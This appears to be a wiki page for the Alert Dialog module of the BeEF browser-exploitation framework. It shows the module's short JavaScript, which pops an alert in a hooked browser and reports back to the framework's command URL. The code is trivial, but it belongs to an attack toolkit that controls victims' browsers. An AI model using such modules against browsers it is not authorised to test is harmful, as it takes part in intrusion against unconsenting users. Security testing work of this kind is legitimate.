Module: Alert Dialog - h4sh5/beef GitHub Wiki
Summary
- Objective: Sends an alert dialog to the hooked browser.
- Date: ???
- Authors: wade, bm
- Browsers: All
- Code
Internal Working
Really basic, here is the whole code :
beef.execute(function() {
alert("<%== format_multiline(@text) %>");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "text=<%== format_multiline(@text) %>");
});
Screenshots


Feedback
- So basic, that it should work on any browser any version.